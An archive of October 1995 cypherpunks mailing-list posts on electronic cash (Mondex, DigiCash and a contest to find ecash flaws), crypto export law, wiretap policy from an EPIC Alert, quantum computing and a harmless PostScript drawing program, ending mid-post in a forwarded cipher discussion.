Cc: hallam@w3.org
Subject: Re: (cpx) Mondex vs. Digicash (was: Godzilla vs. Mothra)
Date: Mon, 23 Oct 95 12:06:43 -0400
From: hallam@w3.org
X-Mts: smtp
Sender: bounce-bsdc@ai.mit.edu
Precedence: bulk
Reply-To: hallam@w3.org


Some comments on the comments:


> The availability of Digicash in the US, for real, with spender
  anonymity, will be announced very soon; reporter activity on
  this subject is consistent with an embargoed press release for
  Monday or Tuesday. From posts to the list it's clear that a fully
  working system, ready for customers, will be announced.

The avbilability in the US I don't consider as meaning much one way or
the other. Mondex is avaliable in Swindon in the UK, a very large and very
serious real world trial.

More importantly Mondex has Wells Fargo Bank behind it and NatWest and HKSB,
these are major league players with very tight coupling, cross ownership of
subsidiaries etc.

> When doing market research on this subject, it became clear that
  low-value payments are largely going to be used for impulse
  purchases. If the Digicash system allows people to set up their
  accounts without getting out of their chairs (which I suspect will
  be the case, if they do it right), it will initially get more
  adopters.

DigiCash will be limited to the Internet, Mondex is genuine cash, it allows
offline purse to purse transactions.

> One or both systems could be found to have serious security problems;
  who knows what the outcome of their discovery & exploitation would be?
  I know at least one group of people who believe they have a good line
  on a serious security problem in Mondex.

If they have the specs they are under an NDA. If you know people who know a
problem tell them to get in touch with Tim Jones, they are very keen to get the
best security possible.

I'm not sure that the conventional "publish everything" dogma of cypher
types is
valid. I don't think they are relying on security through obscurity, they
simply
want it in addition. Mondex is designed with two security schemes to be
exchanged at overlapping four year intervals.

> Even if the Mondex hardware were given away for free, think how
  much fun it is for the average user to add a new piece of hardware
  to their machines... ever install a sound card and CD-ROM drive on
  a PC? I remember reading something like 20% of all "multimedia"
  kits were returned, largely due to user install problems. If there
  is a competing method that costs the same and _doesn't_ require
  the hardware, people will tend go with this.

They need it to be plug 'n play. I expect this to happen.

> In my conversations with state and federal regulators, it is clear
  that it _is_ possible to issue spender-anonymous e-cash. If you ask
  them, "Hey, can I create fully anonymous digital cash?", they go
  apeshit, but if you explain that the money uses existing (auditable)
  channels going in, and existing (auditable) channels going out, and
  that only spenders are anonymous, they relax considerably. They may
  change their minds later, but we're about to get an existence proof.

All I know is that at the mention of DigiCash bankers start muttering
Regulation
E.

> It's not clear that _either_ system is going to win completely in
  the next 10+ years. Although there's been considerable shakeout in
  the last ten years, there is still a huge variety of non-electronic
  payment methods -- how can you be so sure that Mondex will win over
  Digicash, and that they won't co-exist like, say, money orders,
  currency and cashier's checks (three instruments with both similar
  and dissimilar attirbutes)?

Quite probable, except that Mondex is a very credible scheme with very
large and
very established names behind it. I haven't heard of Mark Twain bank. I don't
say that this predetermines the outcome, just that there are reasons why one
might have an advantage.


                Phill H-B
--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Mon, 23 Oct 95 12:31:38 PDT
To: cypherpunks@toad.com
Subject: COMMUNITY CONNEXION TO OFFER REWARD FOR REVEALING HOLES IN ECASH
Message-ID: <199510231926.MAA01446@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


For Immediate Release
Contact: Sameer Parekh
	 sameer@c2.org
         510-601-9777 (pager: 510-321-1014)

COMMUNITY CONNEXION TO OFFER REWARD FOR REVEALING HOLES IN ECASH

October 23, 1995 - Community ConneXion, an internet privacy provider
in Berkeley, California, announced the extension of its existing
"Hack" contests to the electronic cash system announced today by
Digicash bv and Mark Twain Bank.

"The ecash deployment an important step towards making internet
commerce more than just a curiosity," said Sameer Parekh, President of
Community ConneXion. The contest is meant, as with the other "Hack"
promotions being run by Community ConneXion, to encourage the
examination of the security of the ecash system so as to reveal holes
before they are exploited by a criminal element.

Community ConneXion hopes that the inquiry being done into the
security of these products results in a secure infrastructure for the
new paradigms provided by internet commerce. "All internet commerce
systems thus far released have been based in old, out-of-date,
insecure technology, such as credit cards. DigiCash is the first
revolutionary system which can change the way we do business," said
Parekh. "If the move to internet commerce does not radically improve
the way people do business, then we have not taken full advantage of
the potential inherent in the technology."

Details regarding the Hack DigiCash promotion are available on
Community ConneXion's webserver at http://www.c2.org/hackecash/.
Contest submissions should be sent to hackecash@c2.org.

Community ConneXion is the premier internet privacy ISP. They offer
anonymous accounts, remailers, and psuedonym servers, in addition to
the standard ISP fare of webspace and dialup IP access. Information is
available from http://www.c2.org/ or from sending email to
info@c2.org.

Ecash, DigiCash, Cyberbucks, and Mark Twain Bank are trademarks of
their respective owners. This promotion is not affiliated with
DigiCash bv nor Mark Twain Bank.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Mon, 23 Oct 95 12:36:39 PDT
To: cypherpunks@toad.com
Subject: Rising Sun Postscript Code
Message-ID: <199510231935.MAA09475@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


I thought that with all of the talk about Postscript, I might demonstrate
what the language can do.  Here is a Postscript program which will run 
automatically on any machine.  I call it "Rising Sun".

Just attach your headers.


Domo Arigato,

                             Hara De Kangaeru


%--------------Prologue-------------
/inch
     { 72 mul }
     def

/rays
     {     0 5 180
           {    gsave
                     rotate
                     0 0 moveto
                     5 inch 0 rlineto
                     stroke
                grestore }
           for }
     def

/sunRays
    %called as: x y sunRays
    {     newpath
          translate
          .5 setlinewidth
          rays
          0 0 25 0 180 arc
          gsave
                1 setgray
                fill
          grestore
          2 setlinewidth
          stroke     }
     def

%-----------Script-----------
%first set font and show letters
/Helvetica-BoldOblique findfont
3 inch scalefont setfont
1 inch 5 inch translate
0 0 moveto
(SUN) false charpath
gsave
     stroke
grestore
%now set clipping path from restored text path
clip
gsave
     (SUN) stringwidth pop 2 div
     -10 sunRays
grestore
showpage




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Mon, 23 Oct 95 06:05:32 PDT
To: jbaber@mi.leeds.ac.uk
Subject: Re: crypto export from the UK
Message-ID: <25418.9510231303@dart.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Jon Baber <jbaber@mi.leeds.ac.uk> writes:
> sameer <sameer@c2.org> wrote:
> > 	Could people in the UK please tell me what the crypto export
> > laws are like there? I know someone who wrote some really great crypto
> > code in the UK but isn't willing to distribute it because of crypto
> > export laws... I was under the impression that it was legal to export
> > crypto from the UK.
> 
> I believe that the laws regarding the export of crypto from the UK are
> very similar to the ITAR regs in the US.

I thought they were markedly different!

I always understood there were NO restrictions on crypto export,
import or use to western countries.  There used to be COCOM agreements
which said that you should get approval to send commercially produced
crypto to some blacklisted countries (Iraq, etc).  I also read that
the COCOM restrictions did not claim to apply to free software.

Anyway, I read that the COCOM agreement has expired, so none of this
applies anymore, even.

There are a number of surveys around, and the above is my
understanding from reading those.

If you have any thing else I should be reading I'd like to see it.

> However our Government seems to take the view that putting crypto
> software on the net is not exporting it, the exporting is done
> whenever anyone from an export restricted country downloads the
> software and is done by them rather than by the person who made the
> software available.

I also have heard this.

> Strong crypto is therefore openly available from a number of places in
> this country, particually sable.ox.ac.uk at the university of Oxford.

Indeed.

> Of course IANAL and the government may change it's mind about the
> interpretation of these things but I would expect that your
> acquaintance would be perfectly safe distributing his software via
> sable (the ftp site (and its predicessor) have been distributing
> crypto software for a number of years and I have not heard of any
> problems).

I think he would be safe emailing it, putting it on the WWW, or
posting it to USENET.  There are no selective access restrictions on
*any* crypto ftp/http sites that I know of in the UK (like various
ones in the US which make a sho of enforcing the export restriction by
not allowing export to non-US domain names.)

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marshall Clow <mclow@coyote.csusm.edu>
Date: Mon, 23 Oct 95 13:07:17 PDT
To: BRUEN@mitlns.mit.edu
Subject: Re: airport security
Message-ID: <v03003704acb1a4f86721@[204.250.84.2]>
MIME-Version: 1.0
Content-Type: text/plain


>   Without actually agreeing with the FAA, the reason you can't have a name
>   other than your own on your ticket, as well as why you are required to
>   be in your assigned seat on take-off and landing is because if there is
>   a plane crash, they need to be able to identify an otherwise difficult
>   to identify body. This does have some relevance to airport security if
>   a plane is blown up.
>
I do not believe that this is true.

Southwest Airlines has "open seating" on all of their flights, where you
board and then sit in any seat that you choose. (IMHO, an annoying policy)

When a flight is (close to) full, and the flight is running late, many
flight attendants will instruct the last few passengers to "sit in any open
seat". I have seen this on Reno Air, American, and United.

-- Marshall

Marshall Clow
Aladdin Systems
mclow@coyote.csusm.edu
Warning: Objects in calendar are closer than they appear.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cjl <cjl@welchlink.welch.jhu.edu>
Date: Mon, 23 Oct 95 10:18:49 PDT
To: Cypherpunks mailing list <cypherpunks@toad.com>
Subject: Quantum Computation article
Message-ID: <Pine.SOL.3.91.951023122259.5612B-100000@welchlink.welch.jhu.edu>
MIME-Version: 1.0
Content-Type: text/plain



David P. DiVincenzo from the IBM Research Division has written an article 
in the 13th October issue of SCIENCE magazine (vol. 270, pg. 255-261) 
entitled "Quantum Computation".  The article is nicely divide into 
subsections:

- Building blocks of quantum logic
- Quantum circuits
- Peter Shor's prime factorization
- The decoherence problem
- Outlook

From the outlook section "It is evident from this survey of the current 
state of the art in quantum experimental physics that the construction of 
quantum computers is presently in the most rudimentary stage, and that to 
even think about a procedure like Shor factorization, which might require 
millions of operations on thousands of qubits, might be absurdly premature."

If that is the good news for Cypherpunks, then the great news is the 
following.

". . even a few bits of quantum computation will be very useful in 
performing so-called Bell measurements, which could be used to implement 
quantum teleportation, in which an unknown quantum state can be 
trasmitted to a remote location.  At perhaps the 10-qubit level, a 
quantum computer becomes capable of performing Schumacher's quantum 
coding, which would be of interest in the implementation of efficient 
quantum cryptography.  And at perhaps the 100-qubit level, a quantum 
computer becomes an efficient repeater for a noisy (that is partially 
decohered) quantum cryptographic link."

It looks like the advantages of quantum computing accrue to Alice and 
Bob, long before it becomes useful to Eve and Mallet.

A must read for aficianados of "alternative computing".

Here are some URLs from the references

http://vesta.physics.ucla.edu/~smolin/
(Quantum Information Page, Center for Advanced Accelerators)

http://eve.physics.ox.ac.uk/QChome.html
(Quantum Computation and Cryptography page, Clarendon Laboratory, Oxford 
University)

C. J. Leonard                     (    /      "DNA is groovy"
                                   \ /                - Watson & Crick
<cjl@welchlink.welch.jhu.edu>      / \     <--  major groove
                                  (    \
Finger for public key               \   )
Strong-arm for secret key             /    <--  minor groove
Thumb-screws for pass-phrase        /   )





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Blossom <eb@comsec.com>
Date: Mon, 23 Oct 95 14:12:23 PDT
To: frissell@panix.com
Subject: Re: This PROMISes to be odius
In-Reply-To: <199510191813.OAA13667@panix.com>
Message-ID: <199510232044.NAA10925@comsec.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:20 PM 10/18/95 -0400, Brad Dolan wrote:
>
>PR   10/18 0809  ORACLE INTRODUCES SOFTWARE TOOL FOR LAW ENFORCEMENT 
>
>Tool Helps Federal, State, Municipal Agencies Stop the Criminal Element
>
>     Oracle SIUSS represents a major step forward in the collection, storage
>and analysis of case intelligence information for complex conspiracies, violent
>crimes such as rape and murder, drug trafficking, and other major cases.
>

On a related note, the October 1995 issue of Signal (the Official
publication of AFCEA) had this blurb on Oracle's Secure Network
Services product (pg 26):

    "The company's Secure Network Services product is designed to deal
with Internet security issues.  This system is designed for the
structured query language (SQL)* networking family of products for
significant technology advancement in the client-server arena.  The
company is establishing agreements with firewall vendors, such as DEC,
Sun Microsystems, Trusted Information Systems and Secure Computing
Computing Corportation in a new Internet Partners Venture.

    The Secure Network Services version 1.0 specifically deals with
encryption technology supporting RSA Data Security, Incorporated's RC4
encryption algorithm and digital encryption standards.  The RC4
digitial encryption algorithm uses a secret, randomly generated 40-bit
key for every SQL* Net sesssion.  All user network traffic, including
all data values, SQL* statements and stored procedure calls and
results, is safeguarded fully, according to Notargiacomo.  These
features support tamper-proof data transmission.

    The company's Secure Network Services Version 1.1 provides a
highly optimized 56-bit key U.S. data encryption standard (DES)
algorithm known as DES40, a version the combines DES with
international availability of a 40-bit key...

    ... MGen. Richard O'Lear, USAF (Ret.), an Oracle associate director,
notes that, with Secure Network Services, it virtually is impossible
for an intruder to alter or replay data or commands without
detection."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: banisar@epic.org (Dave Banisar)
Date: Mon, 23 Oct 95 10:47:52 PDT
To: cypherpunks@toad.com
Subject: EPIC Alert 2.12 (Wiretap regs, funding, FLIR)
Message-ID: <v02130501acb1932a30a3@[204.91.138.69]>
MIME-Version: 1.0
Content-Type: text/plain



     =============================================================

        @@@@  @@@@  @@@  @@@@      @    @     @@@@  @@@@  @@@@@
        @     @  @   @   @        @ @   @     @     @  @    @
        @@@@  @@@    @   @       @@@@@  @     @@@   @@@     @
        @     @      @   @       @   @  @     @     @  @    @
        @@@@  @     @@@  @@@@    @   @  @@@@  @@@@  @   @   @

     =============================================================
     Volume 2.12                                   October 23, 1995
     -------------------------------------------------------------

                         Published by the
           Electronic Privacy Information Center (EPIC)
                          Washington, DC
                          info@epic.org
                      http://www.epic.org/

            * Special Edition: National Wiretap Plan *

=======================================================================
Table of Contents
=======================================================================

 [1] FBI Wiretap Plan Exceeds Legislative Authority
      (and what you can do)
 [2] Illegal Bugging by US Agencies Continues
 [3] Status of Wiretap Funding
 [4] Court Rules Against Hi-tech Spy Devices
 [5] NTIA to Release Privacy "Policy"
 [6] Privacy Success -- Marketry Drops Plan to Sell Net Data
 [7] ACLU Civil Liberties Update / Privacy Rights Clearinghouse
 [8] Upcoming Conferences and Events

=======================================================================
[1] FBI Wiretap Plan Exceeds Legislative Authority
      (and what you can do)
=======================================================================

The FBI has released a dramatic "reinterpretation" of the Communications
Assistance for Law Enforcement Act (the "Digital Telephony" bill or
"CALEA"). In a Federal Register notice which outlines "capacity
requirements" for surveillance of the nation's communications
infrastructure, the FBI is claiming that compliance with CALEA requires
that telephone companies and other service providers in some regions of
the country build in enough surveillance capacity so that *one percent*
of all phone lines could be *simultaneously* wiretapped, calls isolated,
and forwarded to the FBI. This would permit wiretapping at a level at
least a thousand time greater than currently occurs in the United
States.  This level of surveillance is also far in excess of what
Congress intended when it enacted the CALEA. The rule, if adopted, will
lead to a radical change in the surveillance capabilities of the
government.

The methodology used to determine capacity requirements is also deeply
flawed. Wiretapping reports, as required by law, have always been based
on actual taps authorized, actual conversations intercepted, and actual
lines surveilled. These numbers are reported annually by the
Administrative Office of the U.S. Courts. The Bureau's proposed rule
attempts to shift from the analytic approach required by current wiretap
law to one that is based on percentages of total communications
activity. It is similar (in purpose and magnitude) to a government
agency that had received an annual appropriation of $12 m to argue by
regulation that it was now entitled to 1% of the federal budget (roughly
$18 b).

EPIC has filed a Freedom of Information Act request seeking all
documents relating to the development of this proposed rule.

WHAT YOU CAN DO:

 (a) Submit comments to the FBI.  Object to the "percentage approach" to
     wiretap capacity.  Urge the FBI to follow the current measurement
     of wiretapping, as reported annually by the Administrative
     Office of the U.S. Courts, which considers the actual number of
     wiretaps authorized. If you are a telephone customer, ask
     the FBI to address the privacy risks of unauthorized, illegal, or
     excessive wire surveillance. Comments should be submitted in
     triplicate to the Telecommunications Industry Liaison Unit
     (TILU), Federal Bureau of Investigation, P.O. Box 220450,
     Chantilly, VA 22022-0450. For further information, contact TILU
     at (800) 551-0336. Refer to your question as a "capacity notice"
     inquiry.

       ** Comments must be received by November 15, 1995.**

  (b) If you represent or work for a telecommunications company,
     equipment manufacturer, or service provider, assess carefully the
     cost and liability that this proposed federal regulation may impose
     on your company and the risk that it may expose your customers to
     illegal wiretapping. If you are interested in challenging the
     final FBI rule, contact EPIC and send us a copy of your comments.
     We are prepared to assist individuals and companies with a legal
        challenge.

The FBI Federal Register notice (October 16, 1995, Volume 60, Number
199, Pages 53643 - 53646) is available at:

   http://www.epic.org/wiretap/calea_notice_10_95.txt

EPIC will soon post a copy of its FOIA request and its comments on the
regulation to implement a national wiretap plan.

=======================================================================
[2] Illegal Bugging by U.S. Agencies Continues
=======================================================================

Reports of illegal wiretapping by U.S. agencies are on the rise. Last
week Japanese officials expressed concern over a report of CIA spying
during automotive trade talks earlier this year, and said they would ask
the United States to investigate, according to an October 16 Reuters
report. "This is certainly not a very pleasant matter," said Trade
Minister Ryutaro Hashimoto.  Ichiro Fujisaki, political minister at the
Japanese embassy "expressed the Japanese government's concern that
should the report be true, it could hurt our national sentiment and
U.S.-Japanese friendship and mutual trust."

The New York Times reported earlier that the Central Intelligence Agency
conducted electronic surveillance in the course of preparing reports for
American negotiators prior to an accord reached in June. The Times also
reported that U.S. Trade Representative Mickey Kantor "was regularly
supplied with information gathered about the Japanese negotiation
position by the CIA's Tokyo station and the National Security Agency,
which operates electronic eavesdropping equipment." (NYT, Oct. 14,
1995). The Washington Post confirmed the incident and noted that the
"eavesdropping reflected the U.S. intelligence community's increasing
involvement in economic and commercial information gathering since the
end of the Cold War."

The illegal wiretapping report follows an incident earlier this year
when French officials charged that the United States intelligence
agencies engaged in clandestine monitoring of trade negotiations.

Meanwhile, the President of Estonia was forced to resign following news
that he had engaged in secret wiretapping of political opponents.
According to the New York Times, residents of Estonia wondered whether
the days of Soviet police agents spying on citizens had returned. Newly
chosen President Lennart Mei called the scandal "a crisis of democracy."
 He said, "We must ask ourselves: Does power belong to the people if
surveillance equipment is in the hands of others?"  (NYT, Oct. 18)

Estonia is the most recent country to see its government fall after
public disclosure of illegal wiretapping. In the last few years, Greece
and France have replaced political leaders because of wiretapping
scandals.

=======================================================================
[3] Status of Wiretap Funding
=======================================================================

In 1995 the Communications Assistance for Law Enforcement Act authorized
the expenditure of $500,000,000 over four years to reimburse companies
to design wiretap-ready communications technologies.  But opposition to
the "Digital Telephony" proposal forced the FBI and the White House to
find a creative way to fund the unpopular program.  Now the
Administration is proposing that the $500 M be gathered from a special
fund which authorizes the surcharge of 40 percent on all civil fines
levied by the United States after October 1, 1995, excluding fines
levied by the Internal Revenue Service. [The specific legislative
provision may be found in Title IV of the Counterterrorism Bill, HR 1710
(Civil Monetary Penalty Surcharges and Telecommunications Carrier
Compliance Payments).  The terrorism bill is now under consideration by
Congress and will be the subject of an upcoming EPIC Alert].

But even the "slush" fund may not generate enough money to reimburse
companies to design wiretap capabilities, which some industry experts
estimate may run in excess of $2 billion.  The House appropriations bill
for the Department of Justice sets aside only $50 M for the Telephone
Carrier Compliance program.

The U.S. Telephone Association earlier recommended that the government
follow traditional funding methods for the program rather than the
slush fund approach taken in the Counter-terrorism bill. The benefits
of such a budget, said the USTA, include the fact that "it brings the
process into the sunshine, making government surveillance expenditures
an issue for public scrutiny." (USTA Wiretap Workshop, May 1995). The
Office of Technology Assessment, before its demise, also prepared a
useful overview of the bill and discussed the funding issues --
"Electronic Surveillance in a Digital Age" (OTA 1995).

Further information about wiretapping is available at the EPIC web page:

   http://www.epic.org/privacy/wiretap/

=======================================================================
[4] Court Rules Against Hi-tech Spy Toys
=======================================================================

In a case that illustrates that the protections provided by the Fourth
Amendment against the intrusiveness of modern technologies are still
very much alive, the U.S. Court of Appeals for the 10th Circuit ruled on
October 4 that police must obtain a warrant before using Forward Looking
Infrared Radar (FLIR) devices to examine private residences. FLIR
measures heat differentials on surfaces of as little as 0.5 degrees
Celsius to determine activities inside homes. Police use FLIR devices to
scan neighborhoods an detect houses that emanate heat which may be
caused by "grow" lamps.

In U.S. v. Cusumano, No 94-8056, No 94-8057, Oct. 4, 1995, the court
ruled that new technologies do not eliminate the normal expectation of
privacy that individuals have in their homes. Echoing the words of
Justice Brandeis' opinion in a 1928 wiretap case, the court said:

   the Defendants need not have anticipated and guarded against
   every investigative tool in the government's arsenal. To hold
   otherwise would leave the privacy of the home at the mercy of the
   government's ability to exploit technological advances: the
   government could always argue that an individual's failure (or
   inability) to ward off the incursions of the latest scientific
   innovation forfeits the protection of the Fourth Amendment ... [T]he
   government would allow the privacy of the home to hinge upon the
   outcome of a technological race of measure/counter-measure between
   the average citizen and the government -- a race, we expect, that
   the people will surely lose.

Other courts have split on this question. Recently, the Washington State
Supreme Court ruled that a warrant is required before FLIR can be used
(State v. Young, 867 P.2d 593 (Wash. 1994), while several other federal
appeals courts have ruled that the heat is "waste" not protected by the
Fourth Amendment.  The 10th Circuit opinion rejected the waste argument
"because the interpretation of that data allows the government to
monitor those domestic activities that generate a significant amount of
heat. It . . . strips the sanctuary of the home of one vital dimension
of its security: the 'right to be let alone' from the arbitrary and
discretionary monitoring of our actions by government officials."


=======================================================================
 [5] NTIA to Release Privacy "Policy"
=======================================================================

The National Telecommunications and Information Administration is
expected to release today (October 23) a white paper entitled "Privacy
and the NII: Safeguarding Telecommunications-Related Personal
Information." In an agency press release, NTIA administrator Larry
Irving said, "We hope to contribute to the effort of addressing the
public's concerns regarding the protection of their personal
information." NTIA says the paper will focus on "privacy concerns
associated with an individual's subscription to or use of a
telecommunications or information service."

But if the final NTIA report is at all similar to a privacy policy
discussed by an NTIA official at a conference earlier this month in
Brehmen, Germany there is little that will reassure the public about
this policy. Ignoring mounting evidence that voluntary codes have
failed and that new technologies of privacy should be promoted, the
NTIA recommends a "be careful out there" strategy, in effect saying that it
is better to post warning signs along the information highway than to
make the road safer to travel.

The NTIA proposal specifically recommends the "contract" approach to
privacy that was rejected by European officials earlier this year as
an inadequate safeguard for consumers using advanced communications
services.

NTIA officials, and other members of this Administration, have claimed
that with changing technology it is too difficult to legislative
effectively.  But a different group of public officials, facing a
similar challenge 20 years ago did not make such excuses. *Records,
Computers, and the Rights of Citizens* (1973) was a ground-breaking
report that spoke clearly of the need to protect citizens rights, led to
passage of the Privacy Act of 1974, and established firmly the
importance of Fair Information Practices.  NTIA's report, like the other
privacy "policies" of this administration, will occupy no similar place
in history. The spirit of Clipper has infused this government.

Copies of the report are available from NTIA at 202/482-3999 and will
soon be posted at the EPIC web site with a complete critique.  EPIC has
also prepared a detailed review of an earlier administration privacy
code:

   http://www.epic.org/privacy/internet/epic_nii_privacy.txt


=======================================================================
[6] Privacy Success -- Marketry Drops Plan to Sell Net Data
=======================================================================

In a notable victory for consumer privacy and on-line activism, a
Bellevue, Washington company has backed off plans to sell personal
information gathered from the Internet following reports in the
Washington Post and a call to action in the EPIC Alert.  Marketry
President Norm Swent announced last week "Marketry's resignation as
manager of the email Internet Interest Selector list." However, Marketry
was not the compiler of the data. Another agent could still be found.

Washington Post reporter John Schwartz broke the Marketry story in the
paper's Business section following news of the proposal in the industry
trade publication The Friday Report. The Marketry data was to be
gathered from newsgroup posts, website visits, and chat room comments.

=======================================================================
 [7] ACLU Civil Liberties Alert / Privacy Rights Clearinghouse
=======================================================================

An excellent civil liberties on-line newsletter is the ACLU
Cyber-Liberties Update/

   To subscribe to the ACLU Cyber-Liberties Update, send an e-mail
   message to infoaclu@aclu.org with "subscribe ACLU" in the subject
   line of your message.  For more information about the newsletter,
   contact editor Ann Beeson, beeson@aclu.org.

One of the leading consumer privacy organizations in the country is
the Privacy Rights Clearinghouse in San Diego.  Formed in 1992, the
Clearinghouse has produced many consumers fact sheets on common privacy
concerns, and maintains a toll free hotline to provide advice to
consumers about their rights.

   More information about the Privacy Rights Clearinghouse is available
   at http://www.manymedia.com/prc/. 5998 Alcala Park, San Diego, CA
   92110. (619) 260-4806 (tel). 800-773-7748 (in Cal. only)
   prc@teetot.acusd.edu (email) Director: Beth Givens.

For a comprehensive guide to online privacy resources, check out:

    http://www.epic.org/privacy/privacy_resources_faq.html

=======================================================================
[8] Upcoming Privacy Related Conferences and Events
=======================================================================

SPECIAL: Ram Avrahami will discuss efforts to strengthen consumer
  privacy this week on NPR's Morning Edition and then on CNN Today. For
  more information, check out http://www.epic.org/privacy/junk_mail/)

Smithsonian Institution, "Frontiers in Cyberspace: Encryption, Privacy,
and Cybercodes. October 25, 1995.  Marc Rotenberg, Director, Electronic
Privacy Information Center (EPIC), Philip Zimmermann, Creator, Pretty
Good Privacy (PGP); Stewart Baker, Attorney, Steptoe & Johnson, former
General Counsel, National Security Agency. Contact: Melody Curtis
(CurtisM@aol.com)

Managing the Privacy Revolution. October 31 - November 1, 1995.
Washington, DC. Sponsored by Privacy & American Business. Speakers
include Mike Nelson (White House) C.B. Rogers (Equifax). Contact Alan
Westin 201/996-1154.

Innovation and the Information Environment.  November 3-4. University
of Oregon School of Law in Eugene,  Oregon.  Contact: Keith Aoki
KAOKI@law.uoregon.edu.

National Privacy and Public Policy Symposium.  November 2-4., Hartford,
Cosponsored by the Connecticut Foundation for Open Government. Contact
Richard Akeroyd, rakeroyd@csunet.ctsateu.edu 203/566-4301 (tel),
203/566-8940 (fax)

22nd Annual Computer Security Conference and Exhibition. November 6-8,
Washington, DC. Sponsored by the Computer Security Institute.
Contact: 415-905-2626.

Global Security and Global Competitiveness: Open Source Solutions.
November 7-9. Washington, D.C. Sponsored by OSS. Contact: Robert Steele
oss@oss.net.

"The Right to Privacy," November 9.  Authors Caroline Kennedy and Ellen
Alderman discuss their new book on privacy.  Lizner Auditorium, George
Washington University, Washington, DC.  Contact 202/357-3030.

11th Annual Computer Security Applications Conference: Technical
papers, panels, vendor presentations, and tutorials that address the
application of computer security and safety technologies in the civil,
defense, and commercial environments. December 11-15, 1995, New Orleans,
Louisiana. Contact Vince Reed at (205)890-3323 or vreed@mitre.org.

RSA 6th Annual Data Security Conference:  Cryptography Summit.
Focus on the commercial applications of modern cryptographic technology,
with an emphasis on Public Key Cryptosystems. January 17-19, 1996.
Fairmont  Hotel, San Francisco.  Contact Layne Kaplan Events, at (415)
340-9300, e-mail at info@lke.com, or register at http://www.rsa.com/.

Computers Freedom and Privacy '96. March 27-30. Cambridge, Mass.
Sponsored by MIT, ACM and WWW Consortium. Contact cfp96@mit.edu or
http://www-swiss.ai.mit.edu/~switz/cfp96

Conference on Technological Assaults on Privacy, April 18-20, 1996.
Rochester Institute of Technology, Rochester, New York. Papers should
be submitted by February 1, 1996. Contact Wade Robison privacy@rit.edu,
by FAX at (716) 475-7120, or by phone at (716) 475-6643.

Australasian Conference on Information Security and Privacy June
24-26, 1996. New South Wales, Australia. Sponsored by Australasian
Society for Electronic Security and University of Wollongong. Contact:
Jennifer Seberry (jennie@cs.uow.edu.au).

Visions of Privacy for the 21st Century: A Search for Solutions.
May 9-11, 1996.  Victoria, British Columbia. Sponsored by The Office
of Information and Privacy Commissioner for the Province of British
Columbia and the University of Victoria. Program at
http://www.cafe.net/gvc/foi

18th International Conference of Data Protection and Privacy
Commissioners. Sponsored by the Privacy Commissioner of Canada.
September 18-20, 1996. Ottawa, Canada.

Advanced Surveillance Technologies II. Sponsored by EPIC and Privacy
International. September 17, 1995. Ottawa, Canada. Contact
pi@privacy.org

International Colloquium on the Protection of Privacy and Personal
Information. Commission d'acces a l'information du Quebec. May 1997.
Quebec City, Canada.

             (Send calendar submissions to Alert@epic.org)

=======================================================================

The EPIC Alert is a free biweekly publication of the Electronic
Privacy Information Center.  To subscribe, send the message:

    SUBSCRIBE CPSR-ANNOUNCE Firstname Lastname

to listserv@cpsr.org.  You may also receive the Alert by reading the
USENET newsgroup comp.org.cpsr.announce.

Back issues are available via http://www.epic.org/alert/ or
FTP/WAIS/Gopher/HTTP from cpsr.org /cpsr/alert/ and on Compuserve (Go
NCSA), Library 2 (EPIC/Ethics).


=======================================================================

The Electronic Privacy Information Center is a public interest
research center in Washington, DC.  It was established in 1994 to
focus public attention on emerging privacy issues relating to the
National Information Infrastructure, such as the Clipper Chip, the
Digital Telephony proposal, medical record privacy, and the sale of
consumer data.  EPIC is sponsored by the Fund for Constitutional
Government and Computer Professionals for Social Responsibility. EPIC
publishes the EPIC Alert and EPIC Reports, pursues Freedom of
Information Act litigation, and conducts policy research on emerging
privacy issues. For more information, email info@epic.org, WWW at
HTTP://www.epic.org or write EPIC, 666 Pennsylvania Ave., SE, Suite
301, Washington, DC 20003. (202) 544-9240 (tel), (202) 547-5482 (fax).

The Fund for Constitutional Government is a non-profit organization
established in 1974 to protect civil liberties and constitutional
rights.  Computer Professionals for Social Responsibility is a
national membership organization of people concerned about the impact
of technology on society.  For information contact: cpsr-info@cpsr.org

If you'd like to support the work of the Electronic Privacy Information
Center, contributions are welcome and fully tax-deductible.  Checks
should be made out to "The Fund for Constitutional Government" and sent
to EPIC, 666 Pennsylvania Ave., SE, Suite 301, Washington DC 20003.

Your contributions will help support Freedom of Information Act
litigation, strong and effective advocacy for the right of privacy and
efforts to oppose government regulation of encryption and funding of
the National Wiretap Plan.

Thank you for your support.

------------------------ END EPIC Alert 2.12 ------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dana W. Albrecht" <dwa@corsair.com>
Date: Mon, 23 Oct 95 14:24:54 PDT
To: cypherpunks@toad.com
Subject: Info: Elementrix POTP
Message-ID: <199510232119.OAA08030@elmos.corsair.com>
MIME-Version: 1.0
Content-Type: text/plain


Forwarded from sci.crypt:

In article <45t9oh$6vd@newsbf02.news.aol.com>, whmurray@aol.com (WHMurray) writes:
> In article <45qkp5$8rh@netaxs.com>, grendel@netaxs.com (Michael Handler)
> writes:
> 
> >It 
> >looked somewhat like a stream cipher that generates its key by measuring 
> >packet lag over TCP/IP. General consensus was that any key determined 
> >from public information wasn't secure.
> 
> It uses a new symmetric message key for each message.  The key for message
> n is a function of that for message n-1 modulated by the content of
> message n-1.  However, it operates at the message layer, not the TCP/IP
> layer.  In a given population, everyone in the population can begin with
> the same key.  As messages are exchanged between any two parties in the
> population, they end up with a key which is unique to them.  The system is
